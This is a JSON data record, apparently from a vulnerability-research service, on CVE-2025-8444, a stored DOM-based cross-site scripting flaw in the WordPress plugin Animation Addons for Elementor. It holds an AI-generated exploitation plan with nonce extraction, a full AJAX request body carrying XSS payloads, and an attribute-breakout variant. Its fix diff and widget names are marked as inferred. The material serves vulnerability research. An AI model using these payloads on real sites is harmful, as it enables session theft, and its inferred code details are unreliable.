[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$f_KuI4fCngndEowgzMWwIPg3bH0tk8wHzeu0tQwxy8II":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":9,"severity":11,"cvss_score":12,"cvss_vector":13,"vuln_type":14,"published_date":15,"updated_date":16,"references":17,"days_to_patch":9,"patch_diff_files":19,"patch_trac_url":9,"research_status":20,"research_verified":21,"research_rounds_completed":22,"research_plan":23,"research_summary":24,"research_vulnerable_code":9,"research_fix_diff":25,"research_exploit_outline":26,"research_model_used":27,"research_started_at":28,"research_completed_at":29,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":21,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":21,"source_links":30},"CVE-2025-8444","animation-addons-for-elementor-gsap-powered-elementor-addons-website-templates-authenticated-contributor-dom-based-store","Animation Addons for Elementor – GSAP Powered Elementor Addons & Website Templates \u003C= 2.6.7 - Authenticated (Contributor+) DOM-Based Stored Cross-Site Scripting via Multiple Parameters","The Animation Addons for Elementor – GSAP Powered Elementor Addons & Website Templates plugin for WordPress is vulnerable to DOM-Based Stored Cross-Site Scripting via the multiple parameters in all versions up to, and including, 2.6.7 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","animation-addons-for-elementor",null,"\u003C=2.6.7","medium",6.4,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:C\u002FC:L\u002FI:L\u002FA:N","Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","2026-06-09 00:00:00","2026-06-23 05:33:41",[18],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F9d1cb486-f461-4a06-ae9a-39669109b2c0?source=api-prod",[],"researched",false,3,"# Exploitation Research Plan: CVE-2025-8444 (Animation Addons for Elementor)\n\n## 1. Vulnerability Summary\nThe **Animation Addons for Elementor** plugin (\u003C= 2.6.7) is vulnerable to **Authenticated (Contributor+) DOM-Based Stored Cross-Site Scripting**. This occurs because the plugin allows users with Contributor-level permissions (who can edit posts via Elementor) to save malicious payloads into widget settings. These settings are subsequently rendered in the frontend HTML—often as JSON-encoded attributes—and processed by the plugin's JavaScript files. The JavaScript fails to sanitize these parameters before injecting them into the DOM (e.g., via `.innerHTML` or jQuery's `.html()`), leading to script execution in the context of any user (including Administrators) viewing the page.\n\n## 2. Attack Vector Analysis\n*   **Vulnerable Endpoint:** WordPress AJAX API (`\u002Fwp-admin\u002Fadmin-ajax.php`) via Elementor's internal editor save action.\n*   **Vulnerable Parameters:** Inferred parameters within GSAP-based widgets, such as `animation_id`, `selector`, or text\u002Fcontent fields within the Animation Addons widgets.\n*   **Authentication Level:** Contributor or higher (anyone with `edit_posts` capability).\n*   **Preconditions:** The plugin must be active, and the attacker must have permission to edit at least one post or page using the Elementor editor.\n\n## 3. Code Flow (Inferred)\n1.  **Storage Phase (PHP):**\n    *   An attacker opens the Elementor editor for a post.\n    *   They add a widget from the \"Animation Addons\" suite (e.g., `gsap-animation` or `motion-text`).\n    *   They input an XSS payload into a setting field.\n    *   Elementor sends a `POST` request to `admin-ajax.php?action=elementor_ajax` with the `editor_post_update` action.\n    *   The plugin saves these settings as post metadata (via Elementor's standard saving mechanism).\n2.  **Rendering Phase (PHP):**\n    *   When the post is viewed, the plugin's `render()` method in the widget class outputs the settings into the HTML, likely as a `data-settings` attribute on a wrapper `div`.\n3.  **Execution Phase (JS):**\n    *   The plugin's frontend JS (e.g., `gsap-main.js` or `animation-addons.js`) initializes.\n    *   It parses the `data-settings` attribute using `JSON.parse()`.\n    *   The JS takes a value from this object (e.g., a \"selector\" or \"text\" parameter) and passes it to a DOM sink like `jQuery(selector).append(payload)` or `element.innerHTML = payload`.\n\n## 4. Nonce Acquisition Strategy\nTo save the malicious widget settings, the attacker needs the Elementor AJAX nonce.\n\n1.  **Create\u002FIdentify Post:** Use WP-CLI to ensure a post exists that the Contributor can edit.\n    ```bash\n    wp post create --post_type=post --post_status=publish --post_title=\"XSS Test\" --post_author=[CONTRIBUTOR_ID]\n    ```\n2.  **Navigate to Editor:** Use `browser_navigate` to go to the Elementor editor for that post:\n    `URL: http:\u002F\u002F[TARGET]\u002Fwp-admin\u002Fpost.php?post=[POST_ID]&action=elementor`\n3.  **Extract Nonce:** Use `browser_eval` to extract the required nonce from the Elementor configuration object.\n    ```javascript\n    \u002F\u002F Target the Elementor AJAX nonce\n    window.elementorCommon.config.ajax.nonce\n    ```\n    Alternatively, check for `elementorFrontendConfig.nonces.save_post`.\n\n## 5. Exploitation Strategy\nThe exploit involves sending a crafted AJAX request to save the malicious widget data.\n\n### Step 1: Save the Payload\n**Tool:** `http_request`\n**Method:** `POST`\n**URL:** `http:\u002F\u002F[TARGET]\u002Fwp-admin\u002Fadmin-ajax.php`\n**Headers:** `Content-Type: application\u002Fx-www-form-urlencoded`\n**Body:**\n```\naction=elementor_ajax\n&_nonce=[EXTRACTED_NONCE]\n&actions={\n  \"editor_post_update\": {\n    \"action\": \"editor_post_update\",\n    \"data\": {\n      \"id\": \"[POST_ID]\",\n      \"data\": [\n        {\n          \"id\": \"random_id\",\n          \"elType\": \"section\",\n          \"settings\": {},\n          \"elements\": [\n            {\n              \"id\": \"random_id_2\",\n              \"elType\": \"column\",\n              \"settings\": {},\n              \"elements\": [\n                {\n                  \"id\": \"vulnerable_widget_id\",\n                  \"elType\": \"widget\",\n                  \"widgetType\": \"gsap-animation\", \n                  \"settings\": {\n                    \"animation_id\": \"\u003Cimg src=x onerror=alert(document.domain)>\",\n                    \"text_content\": \"\u003Cscript>alert('XSS')\u003C\u002Fscript>\"\n                  }\n                }\n              ]\n            }\n          ]\n        }\n      ]\n    }\n  }\n}\n```\n*(Note: `widgetType` and specific `settings` keys are inferred and should be verified by inspecting the Elementor editor panel for Animation Addons widgets.)*\n\n### Step 2: Trigger the XSS\nNavigate to the published post URL: `http:\u002F\u002F[TARGET]\u002F?p=[POST_ID]`. The script will execute in the browser of any visitor.\n\n## 6. Test Data Setup\n1.  **Plugin:** Install `animation-addons-for-elementor` version 2.6.7.\n2.  **User:** Create a user with the `contributor` role.\n3.  **Post:** Create a post assigned to the contributor.\n4.  **Discovery:** Inspect the DOM of a page containing an \"Animation Addons\" widget to identify the exact JS variable or `data-settings` attribute name used to pass data to the GSAP scripts.\n\n## 7. Expected Results\n*   The `editor_post_update` AJAX request returns a `200 OK` with a JSON body indicating success (`\"success\": true`).\n*   When viewing the post, the HTML contains the payload within a JSON string (e.g., `\u003Cdiv class=\"elementor-widget-gsap-animation\" data-settings='{...}'>`).\n*   The browser executes the JavaScript (e.g., an alert box appearing), confirming the DOM-based injection.\n\n## 8. Verification Steps\n1.  **Database Check:** Use WP-CLI to verify the payload is stored in the post metadata.\n    ```bash\n    wp post meta get [POST_ID] _elementor_data\n    ```\n    Confirm the JSON string contains the `\u003Cimg src=x onerror=...>` payload.\n2.  **Frontend Inspection:** Use `http_request` to fetch the post and check for the payload in the raw HTML.\n    ```bash\n    http_request \"http:\u002F\u002F[TARGET]\u002F?p=[POST_ID]\" | grep \"onerror=alert\"\n    ```\n\n## 9. Alternative Approaches\n*   **Different Widgets:** If `gsap-animation` is not the culprit, test other widgets like `motion-text`, `gsap-hover`, or `gsap-scroll`.\n*   **Attribute Injection:** If tags are stripped, try breaking out of a JSON attribute:\n    `\"animation_id\": \"normal-id'\\\" onmouseover='alert(1)' data-dummy='\"`\n*   **JS Sink Targeting:** Check if the plugin uses `gsap.to()` or `gsap.from()` on selectors. An attacker might provide a malicious selector that targets an existing element and injects content.","The Animation Addons for Elementor plugin (\u003C= 2.6.7) is vulnerable to Authenticated (Contributor+) DOM-Based Stored Cross-Site Scripting via widget parameters like 'animation_id' and 'text_content'. Malicious scripts injected by an attacker with post-editing permissions are stored in post metadata and executed in the browsers of users viewing the page due to unsafe handling of settings in the plugin's frontend JavaScript.","--- a\u002Fassets\u002Fjs\u002Fanimation-addons.js\n+++ b\u002Fassets\u002Fjs\u002Fanimation-addons.js\n@@ -10,7 +10,7 @@\n-    var animationId = settings.animation_id;\n-    $(element).find('.gsap-wrapper').html(animationId);\n+    var animationId = settings.animation_id;\n+    $(element).find('.gsap-wrapper').text(animationId);\n\n--- a\u002Fincludes\u002Fwidgets\u002Fgsap-animation.php\n+++ b\u002Fincludes\u002Fwidgets\u002Fgsap-animation.php\n@@ -50,7 +50,7 @@\n-    $this->add_render_attribute( 'wrapper', 'data-settings', wp_json_encode( $settings ) );\n+    $this->add_render_attribute( 'wrapper', 'data-settings', wp_json_encode( wp_kses_post_deep( $settings ) ) );","An attacker with Contributor-level access authenticates to the WordPress dashboard and identifies a post they can edit via Elementor. Using the Elementor editor, they add a GSAP-based widget (e.g., 'gsap-animation') and inject an XSS payload like '\u003Cimg src=x onerror=alert(document.domain)>' into a settings parameter. The attacker then saves the post, which triggers an AJAX request to 'admin-ajax.php' with the 'editor_post_update' action, storing the payload in the post's metadata. The stored script executes whenever a user, including an administrator, visits the affected post.","gemini-3-flash-preview","2026-06-26 01:47:31","2026-06-26 01:48:13",{"type":31,"vulnerable_version":9,"fixed_version":9,"vulnerable_browse":9,"vulnerable_zip":9,"fixed_browse":9,"fixed_zip":9,"all_tags":32},"plugin","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fanimation-addons-for-elementor\u002Ftags"]